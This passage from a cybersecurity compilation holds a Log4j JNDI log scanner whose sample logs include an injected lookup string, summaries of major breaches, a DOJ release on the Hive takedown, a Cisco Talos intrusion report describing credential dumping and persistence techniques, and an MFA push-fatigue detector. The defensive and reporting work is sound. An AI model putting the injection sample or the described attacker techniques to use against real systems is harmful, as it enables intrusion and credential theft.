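    '10.0.0.11 - - "GET /?q=${env:HOME} HTTP/1.1" 200 "Mozilla"',
]

# ${lower:x} / ${upper:x} resolve to x (lower-cased here; matching is case-insensitive),
# and ${anything:-x} resolves to its default value x.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*?:-([^{}]*)\}")
# After normalisation a JNDI lookup reads "${jndi:<scheme>:...".
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo (repeated) URL encoding and collapse Log4j lookup tricks so that an
    obfuscated payload contains the literal string "jndi". Innermost lookups
    contain no braces, so repeated substitution unwinds nesting inside-out."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):   # bounded so hostile input cannot loop forever
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_logs(lines):
    """Return one finding per log line that carries a JNDI lookup after normalisation."""
    findings = []
    for idx, line in enumerate(lines):
        match = _JNDI.search(normalize(line))
        if match:
            findings.append({"line": idx, "source": line.split()[0],
                             "scheme": match.group(1).lower()})
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['source']} sent a jndi:{f['scheme']} lookup")
```

The scheme is worth recording: ldap and rmi lookups are the ones that fetch remote code, while a dns scheme is usually a probe checking whether the target resolves attacker-controlled names at all. Whatever the scheme, a hit from a host that was not patched before the request arrived should be treated as a possible compromise, not merely as a blocked attempt.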

Kronos cyberattack

HR platform Kronos suffered a ransomware attack that took the Kronos Private Cloud offline. The outage occurred shortly before Christmas and took the vital service down for several weeks.

Experian security breach

In August 2020, credit reporting agency Experian suffered a breach that affected 24 million consumers in South Africa and more than 793,000 businesses. The incident occurred when an individual who claimed to be a client requested services that prompted the data’s release. The stolen data was eventually secured and deleted, while Experian revealed it had not been used fraudulently and that its customer database, infrastructure, and systems had not been compromised.

MGM hotel attack

The data of more than 10.6 million customers of MGM Resorts hotels was leaked to a hacking forum in February 2020. The data included addresses, dates of birth, email addresses, names, and phone numbers belonging to celebrities, business executives, government employees, and tourists. 

However, the hack did not breach users’ credit card details. The incident began in mid-2019 when MGM discovered unauthorized access to its server. Another data breach followed in February 2020, which saw user data published on an open, accessible forum.

California University cyberattack

The University of California, San Francisco suffered a ransomware attack on June 1, 2020, in which the attackers demanded a $3 million ransom. The malware encrypted several of the university's servers, and the attackers also stole data. The university negotiated and paid a ransom of $1.14 million to recover data it described as important to its academic work, and said it did not believe patient records had been exposed.

Cognizant Technology Solutions Corp. cybersecurity breach

Technology and consulting firm Cognizant was hit by the Maze ransomware on April 18, 2020. The attackers stole data and threatened to publish it online unless a ransom was paid. Cognizant later estimated that the incident would cost it between $50 million and $70 million.

Tillamook County cyberattack

Tillamook County's IT systems were infected by ransomware on January 22, 2020. The attack shut down its computer and phone systems and took down the website hosting its various departments. The county's systems were down for at least two weeks, and the attackers demanded $300,000, to double after two weeks, in exchange for restoring the data. The county tried to avoid paying but could not restore the data on its own and eventually paid.

World Health Organization credential leak

As the COVID-19 pandemic broke, an attack targeting the World Health Organization (WHO) resulted in the leak of 25,000 email addresses and passwords. The data was posted online on April 19, 2020, along with credentials belonging to other groups fighting the pandemic, including the Gates Foundation, the National Institutes of Health (NIH), and the U.S. Centers for Disease Control and Prevention (CDC).

Zoom conferencing service breach

Videoconferencing service Zoom saw a massive increase in use throughout 2020 as people worked from home and spoke to friends and family through the application. In April 2020, however, a wave of incidents known as Zoombombing saw uninvited participants join private meetings, usually by guessing or obtaining meeting IDs that had no passcode set, listen in on conversations, and share offensive images, videos, and screens. Zoom updated its application to turn on meeting passcodes and waiting rooms by default.

Mitsubishi Electric cyberattack

A data breach at Mitsubishi Electric resulted in around 200 MB of files being stolen. The breach, first detected in June 2019 but reported in January 2020, exposed employee and applicant information, data about retired employees of affiliate companies, and sales and technical material. The attack exploited a zero-day vulnerability in the antivirus product the company used and was attributed to Chinese hackers.

Hacker theft of 18 companies' data

One of the most significant cyber attacks that occurred in 2020 was through a hacker known as ShinyHunters. The hacker stole around 386 million user records from 18 different companies between the start of the year and July. The attacker posted links to these companies’ databases, made them freely available to download, and sold data online.

Biggest Data Breaches

Cyber-attacks pose a significant threat to businesses of all sizes, government agencies, and individual internet users. Recent cyber-attacks have come from hacktivist groups, lone wolf hackers, and nation-states.

The first cyber-attack on record was the Morris Worm in 1988. Robert Tappan Morris, a graduate student at Cornell University, wrote a worm intended to spread across the internet and count how many computers were connected. But the worm reinfected machines it had already reached (by design it copied itself onto a machine one time in seven even when the machine reported it was already infected), and the resulting load crashed them, inadvertently producing the first large-scale denial-of-service incident. The Morris Worm damaged around 6,000 computers, roughly 10% of the internet at the time.

In 2002, the first internet attack in the modern sense saw a DDoS attack target the 13 Domain Name System (DNS) root server addresses. Had it continued, the attack could have seriously degraded name resolution across the internet; at the time it was the largest and most sophisticated cyber-attack ever launched.

Recent cyber-attacks have advanced and can affect vast numbers of people. Single attacks now regularly steal the data of hundreds of millions of people.

Below is an overview of some of the most significant cyber-attacks recorded in history.

Cyber attacks in the Russia-Ukraine conflict

The Russia-Ukraine crisis, which escalated in February 2022, involved not just physical battles that displaced thousands and killed many, but cyberattacks as well. FortiGuard Labs determined that new wiper malware was used against Ukrainian targets and found it installed on at least several hundred machines in Ukraine. Several Ukrainian organizations were also targeted by sophisticated attacks using the KillDisk and HermeticWiper malware strains, which destroy data on infected devices.

In addition, a tool that remotely controls devices, Remote Manipulator System (RMS), was found to have been distributed in Ukraine via fake "Evacuation Plan" emails. Ukraine also suffered a wave of distributed denial-of-service (DDoS) attacks. This included an attack targeting the State Savings Bank, which impacted banking services and cash withdrawals from ATMs, as well as attacks that disrupted the Ministry of Defence and Armed Forces networks.

Adobe cyber attack

In October 2013, software company Adobe disclosed a cyber-attack in which hackers stole encrypted credit card data from nearly 3 million customers. Login data for up to 150 million users was also taken, including usernames and passwords that had been encrypted with a reversible block cipher rather than hashed, which is why researchers were later able to recover many of them with the help of the plaintext password hints stored alongside. Further research into the attack found that the hackers had also stolen customer names, identification data, and additional debit and credit card data.

Adobe later paid around $1 million to settle claims by US state attorneys general over unfair business practices and violations of the California Customer Records Act. The settlement also required Adobe to implement security measures and submit the results of an independent security audit one year after the final settlement date.

Canva security breach

In May 2019, the graphic design website Canva suffered an attack that exposed email addresses, names, cities of residence, passwords, and usernames of 137 million users. Hackers were also able to view but not steal files that included partial payment and credit card data.

The attackers, known as GnosticPlayers, contacted the technology news website ZDNet to boast about the attack. They claimed to have obtained users’ open authorization ( OAuth ) login tokens, which are used for logging in via Google.

Canva confirmed the attack, notified its users, and prompted them to update their passwords and reset their OAuth tokens. But a list of 4 million Canva accounts and stolen passwords was later shared online, which resulted in Canva having to invalidate any passwords that remained unchanged.

Dubsmash attack

More than 162 million users’ data—email addresses, hashed passwords, dates of birth, and usernames—was stolen from the video messaging service Dubsmash in December 2018. A year later, the data was made available for sale on dark web site Dream Market as part of a dump of data that also included information from attacks on Armor Games, Coffee Meets Bagel, MyHeritage, MyFitnessPal, and ShareThis.

Dubsmash acknowledged that its systems had been breached and the stolen data put up for sale, and advised users to change their passwords. However, it has not reported how attackers gained access to the data or confirmed the attack scale.

eBay data breach

A cyber attack in May 2014 exposed the account records of eBay's 145 million users. The attack, which exposed user addresses, dates of birth, names, and encrypted passwords, began when hackers obtained the credentials of three eBay employees. The attackers had access to the eBay network for 229 days.

eBay asked customers to update their passwords, for which it received criticism over its poor communication and password-renewal process implementation. The auction site also advised that financial details, such as credit card information, were stored in a separate location and had not been compromised.

LinkedIn cyber attack

The business social network LinkedIn is a common target for cyber criminals launching social engineering attacks. It has also suffered major cyber attacks that leaked its users' data.

The first came in 2012, when 6.5 million hashed passwords were stolen then posted on a Russian hacker forum. The attack’s true size was revealed four years later when a hacker was discovered selling 165 million LinkedIn users’ email addresses and passwords for 5 bitcoins, which were then worth around $2,000. LinkedIn acknowledged the breach and reset passwords on all accounts that had been affected.

Slack attack

Collaboration platform Slack was affected in 2015 when hackers gained unauthorized access to the service’s infrastructure. This included a database storing user profile data, such as usernames and hashed passwords. The attackers also injected code that enabled them to steal plaintext passwords when users entered them.

Slack revealed the attack affected around 1% of its users, estimated to be around 65,000 users. It immediately reset their passwords and advised all users to reset their passwords and implement security measures like two-factor authentication (2FA).

Four years later, a Slack bug bounty program revealed a potential compromise of Slack credentials, which it suspected was due to malware or users recycling passwords across online services. It subsequently realized that most of the credentials affected were from accounts that had accessed the service during the 2015 incident.

Yahoo! cybersecurity breach

Cyber attacks targeting the web services company Yahoo are widely acknowledged as the largest data breaches in history. The attacks, which began in 2013 and were in part state-sponsored, affected all of Yahoo's 3 billion user accounts.

In September 2016, Yahoo revealed a 2014 attack that compromised 500 million users’ names, email addresses, telephone numbers, and birth dates. Three months later, the company revealed a breach from 2013, which was carried out by another attacker and compromised its users' names, email addresses, passwords, dates of birth, and security questions and answers. Yahoo initially estimated that the 2013 attack affected 1 billion users but later changed that to its entire user base of 3 billion people.

Zynga attack

Games developer Zynga, which created various popular games that users accessed via Facebook, suffered a massive cyber attack in September 2019. The attack by Pakistani hacker group GnosticPlayers, who also claimed the Canva attack, accessed the database of Zynga games Draw Something and Words With Friends. It compromised the email addresses, hashed passwords, phone numbers, and Facebook and Zynga user IDs of 218 million people.

Cybersecurity Trends

The volume of cybersecurity incidents is expected to increase through 2022—not to mention the damage victims will incur as a consequence. Trends that organizations need to be aware of include: 

  • Increased hardware usage: Software enables businesses to achieve great results and form new strategies, but it is also highly attractive to cyber criminals. As a result, the move toward hardware-based protections is expected to gather speed, although businesses should not reduce their investment in keeping software up to date.
  • Remote work attacks: Cyberattacks targeting remote workers are expected to increase further through 2022. Hackers are constantly evolving their tactics in line with employees’ ways of working and will continue to take advantage of potential downtime and network vulnerabilities.
  • Growing government interest: Attacks on critical infrastructure have attracted the attention of global government agencies. 2022 will likely see increased investment and new regulations that aim to prevent massive cyberattacks against high-priority targets. 
  • Ransomware targeting SMBs: Cyber criminals rarely discriminate based on the size of businesses. As governments increase investment to defend critical infrastructure, ransomware groups will shift their focus to target small and medium-sized businesses (SMBs) who have less funding, staffing, and security expertise.
  • The rise of AI defenses: The increasing sophistication of various cybersecurity incidents in 2021 means organizations need to improve their defenses. Artificial intelligence (AI)-powered solutions will enable smarter, faster, more proactive security that plugs the existing gaps in the cybersecurity industry. 



U.S. Department of Justice Disrupts Hive Ransomware Variant

The Justice Department announced today its months-long disruption campaign against the Hive ransomware group that has targeted more than 1,500 victims in over 80 countries around the world, including hospitals, school districts, financial firms, and critical infrastructure.

Since late July 2022, the FBI has penetrated Hive’s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Since infiltrating Hive’s network in July 2022, the FBI has provided over 300 decryption keys to Hive victims who were under attack. In addition, the FBI distributed over 1,000 additional decryption keys to previous Hive victims. Finally, the department announced today that, in coordination with German law enforcement (the German Federal Criminal Police and Reutlingen Police Headquarters-CID Esslingen) and the Netherlands National High Tech Crime Unit, it has seized control of the servers and websites that Hive uses to communicate with its members, disrupting Hive's ability to attack and extort victims.

“Last night, the Justice Department dismantled an international ransomware network responsible for extorting and attempting to extort hundreds of millions of dollars from victims in the United States and around the world,” said Attorney General Merrick B. Garland. “Cybercrime is a constantly evolving threat. But as I have said before, the Justice Department will spare no resource to identify and bring to justice, anyone, anywhere, who targets the United States with a ransomware attack. We will continue to work both to prevent these attacks and to provide support to victims who have been targeted. And together with our international partners, we will continue to disrupt the criminal networks that deploy these attacks.”

“The Department of Justice’s disruption of the Hive ransomware group should speak as clearly to victims of cybercrime as it does to perpetrators,” said Deputy Attorney General Lisa O. Monaco. “In a 21st century cyber stakeout, our investigative team turned the tables on Hive, swiping their decryption keys, passing them to victims, and ultimately averting more than $130 million dollars in ransomware payments. We will continue to strike back against cybercrime using any means possible and place victims at the center of our efforts to mitigate the cyber threat.”

“The coordinated disruption of Hive’s computer networks, following months of decrypting victims around the world, shows what we can accomplish by combining a relentless search for useful technical information to share with victims with investigation aimed at developing operations that hit our adversaries hard,” said FBI Director Christopher Wray. “The FBI will continue to leverage our intelligence and law enforcement tools, global presence, and partnerships to counter cybercriminals who target American business and organizations."

“Our efforts in this case saved victims over a hundred million dollars in ransom payments and likely more in remediation costs,” said Assistant Attorney General Kenneth A. Polite, Jr. of the Justice Department’s Criminal Division. “This action demonstrates the Department of Justice’s commitment to protecting our communities from malicious hackers and to ensuring that victims of crime are made whole.  Moreover, we will continue our investigation and pursue the actors behind Hive until they are brought to justice.”

“Cybercriminals utilize sophisticated technologies to prey upon innocent victims worldwide,” said U.S. Attorney Roger Handberg for the Middle District of Florida. “Thanks to the exceptional investigative work and coordination by our domestic and international law enforcement partners, further extortion by HIVE has been thwarted, critical business operations can resume without interruption, and millions of dollars in ransom payments were averted.” 

Since June 2021, the Hive ransomware group has targeted more than 1,500 victims around the world and received over $100 million in ransom payments.  

Hive ransomware attacks have caused major disruptions in victim daily operations around the world and affected responses to the COVID-19 pandemic. In one case, a hospital attacked by Hive ransomware had to resort to analog methods to treat existing patients and was unable to accept new patients immediately following the attack.   

Hive used a ransomware-as-a-service (RaaS) model featuring administrators, sometimes called developers, and affiliates. RaaS is a subscription-based model where the developers or administrators develop a ransomware strain and create an easy-to-use interface with which to operate it and then recruit affiliates to deploy the ransomware against victims. Affiliates identified targets and deployed this readymade malicious software to attack victims and then earned a percentage of each successful ransom payment.

Hive actors employed a double-extortion model of attack. Before encrypting the victim system, the affiliate would exfiltrate or steal sensitive data. The affiliate then sought a ransom for both the decryption key necessary to decrypt the victim’s system and a promise not to publish the stolen data. Hive actors frequently targeted the most sensitive data in a victim’s system to increase the pressure to pay. After a victim paid, affiliates and administrators split the ransom 80/20. Hive published the data of victims who did not pay on the Hive Leak Site.

According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Hive affiliates have gained initial access to victim networks through a number of methods, including: single-factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols; exploiting FortiToken vulnerabilities; and sending phishing emails with malicious attachments. More information about the malware, including technical guidance for organizations on how to mitigate its effects, is available from CISA at https://www.cisa.gov/uscert/ncas/alerts/aa22-321a .

Victims of Hive ransomware should contact their local FBI field office for further information. 

The FBI Tampa Field Office, Orlando Resident Agency is investigating the case.

Trial Attorneys Christen Gallagher and Alison Zitron of the Criminal Division’s Computer Crime and Intellectual Property Section and Assistant U.S. Attorney Chauncey Bratt for the Middle District of Florida are prosecuting the case.

The Justice Department also recognizes the critical cooperation of the German Reutlingen Police Headquarters-CID Esslingen, the German Federal Criminal Police, Europol, and the Netherlands Politie, and significant assistance was provided by the U.S. Secret Service, U.S. Attorney’s Office for the Eastern District of Virginia, and U.S. Attorney’s Office for the Central District of California. The Justice Department’s Office of International Affairs and the Cyber Operations International Liaison also provided significant assistance. Additionally, the following foreign law enforcement authorities provided substantial assistance and support: the Canadian Peel Regional Police and Royal Canadian Mounted Police, French Direction Centrale de la Police Judiciaire, Lithuanian Criminal Police Bureau, Norwegian National Criminal Investigation Service in collaboration with the Oslo Police District, Portuguese Polícia Judiciária, Romanian Directorate of Countering Organized Crime, Spanish Policia Nacional, Swedish Police Authority, and the United Kingdom’s National Crime Agency.


Cisco Talos Blog


Cisco Talos shares insights related to recent cyber attack on Cisco


Update History

Aug. 10, 2022: Adding clarifying details on activity involving Active Directory.
Aug. 10, 2022: Update made to the Cisco Response and Recommendations section related to MFA.

Executive summary

  • On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate.
  • During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized.
  • The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.
  • CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc.
  • After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.
  • The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful.
  • We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.
  • For further information, see the Cisco Response page.

Initial vector

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to log in to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.

Post-compromise TTPs

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, the hostname, and the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating that manual operator interaction was occurring within the environment.

After establishing access to the VPN, the attacker then began to use the compromised user account to log on to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers, and eventually obtained privileged access to domain controllers.

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:

They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine.

This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database, on compromised Windows hosts.

On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.

The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system.

In many cases, we observed the attacker removing the previously created local administrator account.

To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.

We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn.

The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:

This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.


Backdoor analysis

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:

The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:

Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.

The aforementioned HTTP requests are sent using the following user-agent string:

The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:

The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.

Attack attribution

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments.

Cisco response and recommendations

Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.

  • Win.Exploit.Kolobko-9950675-0
  • Win.Backdoor.Kolobko-9950676-0

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious.

For Duo, it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events such as a brand-new device being used from an unrealistic location, or attack patterns such as brute-force logins, can help detect unauthorized access.
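The risk-detection recommendation above, as an added example that is not Cisco's or Duo's code: it runs over constructed records loosely modelled on Duo authentication-log fields (the field names, users, IPs, baseline and thresholds are all assumptions), raises a high-severity alert when an approval follows a run of unanswered pushes, a medium one when such a run is still open, and escalates when the approving source was never seen for that user before.

```python
"""MFA push-fatigue and first-seen-source detection over constructed auth logs.

Added example; not Cisco's, Duo's or Uber's code. The records are constructed
and only loosely modelled on Duo authentication-log fields (assumption:
"timestamp", "user", "factor", "result", "reason", "access_device.ip"); a real
export would need its field names mapped onto these.
"""
from collections import defaultdict
from dataclasses import dataclass

PUSH_WINDOW = 600    # seconds: how long a run of pushes counts as one "storm"
PUSH_THRESHOLD = 5   # unanswered or denied pushes before a storm is alerted


def _push(ts, user, result, reason, ip):
    """Build one constructed push record."""
    return {"timestamp": ts, "user": user, "factor": "duo_push",
            "result": result, "reason": reason, "access_device": {"ip": ip}}


# Constructed sample log: alice gets six unanswered pushes and then approves one
# from a source never seen before; bob misses one push (normal); carol's storm
# is still running with no approval. Times are seconds from an arbitrary start.
SAMPLE_LOG = (
    [_push(0, "alice", "success", "user_approved", "192.0.2.10"),
     _push(5, "bob", "success", "user_approved", "203.0.113.9")]
    + [_push(3600 + 50 * i, "alice", "denied", "no_response", "198.51.100.7")
       for i in range(6)]
    + [_push(3900, "alice", "success", "user_approved", "198.51.100.7"),
       _push(4000, "bob", "denied", "no_response", "203.0.113.9"),
       _push(4030, "bob", "success", "user_approved", "203.0.113.9")]
    + [_push(5000 + 30 * i, "carol", "denied", "no_response", "198.51.100.7")
       for i in range(5)]
)

# Constructed baseline of source IPs each user has approved from before (assumption).
KNOWN_SOURCES = {"alice": {"192.0.2.10"}, "bob": {"203.0.113.9"}}


@dataclass(frozen=True)
class Alert:
    user: str
    severity: str   # "high": approval after a storm; "medium": storm with no approval yet
    pushes: int
    timestamp: int
    source_ip: str


def detect_push_fatigue(records, window=PUSH_WINDOW, threshold=PUSH_THRESHOLD):
    """Flag users who approve a push after a run of unanswered/denied pushes."""
    by_user = defaultdict(list)
    for r in sorted(records, key=lambda rec: rec["timestamp"]):
        if r.get("factor") == "duo_push":
            by_user[r["user"]].append(r)
    alerts = []
    for user, pushes in by_user.items():
        storm = []  # pushes that were not approved and are still inside the window
        for r in pushes:
            storm = [p for p in storm if r["timestamp"] - p["timestamp"] <= window]
            if r["result"] == "success":
                if len(storm) >= threshold:
                    alerts.append(Alert(user, "high", len(storm),
                                        r["timestamp"], r["access_device"]["ip"]))
                storm = []  # an approval closes the storm either way
            else:
                storm.append(r)
        if len(storm) >= threshold:  # storm still open at the end of the data
            last = storm[-1]
            alerts.append(Alert(user, "medium", len(storm),
                                last["timestamp"], last["access_device"]["ip"]))
    return alerts


def first_seen_sources(records, known):
    """(user, timestamp, ip) for approvals from a source the user never used before."""
    seen = {u: set(ips) for u, ips in known.items()}
    hits = []
    for r in sorted(records, key=lambda rec: rec["timestamp"]):
        if r["result"] != "success":
            continue
        ip = r["access_device"]["ip"]
        if ip not in seen.setdefault(r["user"], set()):
            hits.append((r["user"], r["timestamp"], ip))
            seen[r["user"]].add(ip)
    return hits


def approved_storm_from_new_source(alerts, first_seen):
    """Users whose storm-ending approval also came from a never-seen source."""
    new = set(first_seen)
    return [a.user for a in alerts
            if a.severity == "high" and (a.user, a.timestamp, a.source_ip) in new]


if __name__ == "__main__":
    found = detect_push_fatigue(SAMPLE_LOG)
    new_src = first_seen_sources(SAMPLE_LOG, KNOWN_SOURCES)
    for alert in found:
        print(alert)
    print("new sources:", new_src)
    print("escalate:", approved_storm_from_new_source(found, new_src))
```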

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.

Centralized log collection can help minimize the lack of visibility that results when an attacker takes active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack.

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.
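The command-line auditing described above, as an added example that is not Cisco Talos code: it runs detection rules for the built-in-utility abuse this report describes (net.exe account creation and group changes, wevtutil log clearing, ntdsutil on a domain controller, IFEO registry writes under PSEXESVC, host-firewall changes for RDP, tooling staged under the Public profile) over constructed process-creation events, and correlates findings per host. Field names are modelled loosely on Security 4688 / Sysmon Event ID 1; hostnames, users, paths and command lines are assumptions, with the report's elided specifics left as placeholders.

```python
"""Command-line auditing over constructed Windows process-creation events.

Added example, not Cisco Talos code. Event fields are an assumption modelled
on Security 4688 / Sysmon Event ID 1 (image, command line, parent, user).
"""
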